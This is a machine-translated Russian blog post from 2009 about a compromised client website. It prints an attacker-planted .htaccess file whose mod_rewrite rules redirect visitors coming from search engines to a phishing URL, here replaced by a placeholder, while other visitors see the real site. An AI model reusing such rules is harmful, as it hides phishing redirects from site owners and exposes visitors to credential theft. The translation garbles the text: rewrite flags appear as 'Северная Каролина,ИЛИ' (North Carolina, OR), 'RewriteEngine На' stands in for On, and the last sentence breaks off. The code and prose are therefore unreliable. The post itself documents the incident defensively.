Четверг, 22 января, 2009 | Автор:

Я совсем недавно обнаружили проблему с веб-сайта клиента в связи с .Htaccess файл. Сайт размещался Окна работает сервер IIS использование IISPassword, что делает использование .Htaccess файлы для его настройки.

IISPassword не следует ровно тем же правилам, с Апаш однако. Если файл. Htaccess существует, то его должен содержат IISPassword-соответствующие правила, в противном случае сервер возвращает только следующую ошибку:

Error 500 given by IIS Password
Вот содержимое файла. Htaccess. Я только изменение окончательный URL перенаправления, чтобы указать на example.com надлежащим:

RewriteEngine На
RewriteCond %{HTTP_REFERER} .*Google. * $ [Северная Каролина,ИЛИ]
RewriteCond %{HTTP_REFERER} .*AOL. * $ [Северная Каролина,ИЛИ]
RewriteCond %{HTTP_REFERER} .*MSN. * $ [Северная Каролина,ИЛИ]
RewriteCond %{HTTP_REFERER} .*Yahoo. * $ [Северная Каролина,ИЛИ]
RewriteCond %{HTTP_REFERER} .*Яндекс. * $ [Северная Каролина,ИЛИ]
RewriteCond %{HTTP_REFERER} .*Рамблер. * $ [Северная Каролина,ИЛИ]
RewriteCond %{HTTP_REFERER} .*уже. $ [Северная Каролина]
RewriteRule .* HTTP://siffy-фишинг-url.example.com [R,L]

Если это были на сервере под управлением Apache с mod_rewrite, большинство пользователей Интернета будут поступать непосредственно в правильном контента сайта. Только если они достигли сайт через поисковые системы и индексов, перечисленных в. Htaccess, они будут перенаправлены на siffy фишинг URL, что взломщик хочет жертвы для достижения.

Конечно, взломщик (или, возможно, даже автоматизированная червь) не понимал, что сервер в вопросе даже не поддерживать эти правила mod_rewrite. Но в любом случае, это очень тревожный, как я могу предвидеть много аргументов о том, стоит сайт работа

Поделиться
Категория: хостинг, случайный
Вы можете следить за ответами к этой записи через RSS 2.0 подача. Вы можете оставить ответ, или Архив с вашего собственного сайта.
Оставить комментарий » Войти